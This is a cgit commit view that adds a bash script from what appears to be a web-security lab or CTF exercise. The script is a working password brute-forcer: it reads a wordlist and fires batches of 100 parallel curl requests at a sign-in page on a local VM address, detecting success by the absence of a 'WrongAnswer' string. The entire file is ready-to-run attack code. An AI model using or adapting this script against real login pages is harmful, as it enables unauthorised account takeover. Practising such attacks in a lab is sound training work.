aboutsummaryrefslogtreecommitdiffstats
path: root/Brute force password guessing/Resources/brute_force.bash
diff options
context:
space:
mode:
Diffstat (limited to 'Brute force password guessing/Resources/brute_force.bash')
-rwxr-xr-xBrute force password guessing/Resources/brute_force.bash45
1 files changed, 45 insertions, 0 deletions
diff --git a/Brute force password guessing/Resources/brute_force.bash b/Brute force password guessing/Resources/brute_force.bash
new file mode 100755
index 0000000..8f77578
--- /dev/null
+++ b/Brute force password guessing/Resources/brute_force.bash
@@ -0,0 +1,45 @@
+#!/usr/bin/bash
+set -o nounset
+set -o errexit
+
+username="${1:?username argument missing}"
+dict="${2:?password dictionary argument missing}"
+mapfile -t passwords <"$dict"
+OUT_FILE=$(mktemp)
+
+test_pass() {
+ username="$1"
+ password="$2"
+ # Password and username has to be urlencoded
+ curl --get \
+ --silent \
+ --data-urlencode username="${username}" \
+ --data-urlencode password="${password}" \
+ "http://10.0.2.15/?page=signin&Login=Login#" |
+ grep --quiet "WrongAnswer"
+}
+
+BATCH_SIZE=100
+echo "Testing all passwords in \"$dict\" with username \"$username\" in batches of $BATCH_SIZE."
+password_count=${#passwords[@]}
+((password_count--))
+while ((password_count >= 0)); do
+ tmp=$BATCH_SIZE
+ while ((tmp-- > 0 && password_count >= 0)); do
+ {
+ pass="${passwords[password_count]}"
+ if ! test_pass "$username" "$pass"; then
+ echo "$pass" >"$OUT_FILE"
+ fi
+ } &
+ ((password_count--))
+ done
+ echo "Waiting for batch to finish…"
+ wait
+ echo "$((password_count + 1)) passwords left"
+ if [ -s "$OUT_FILE" ]; then
+ echo "Password found: $(cat "$OUT_FILE")"
+ exit
+ fi
+done
+echo "Password not found :("
generated by cgit v1.2.3 (git 2.46.0) at 2026-04-16 14:34:39 +0000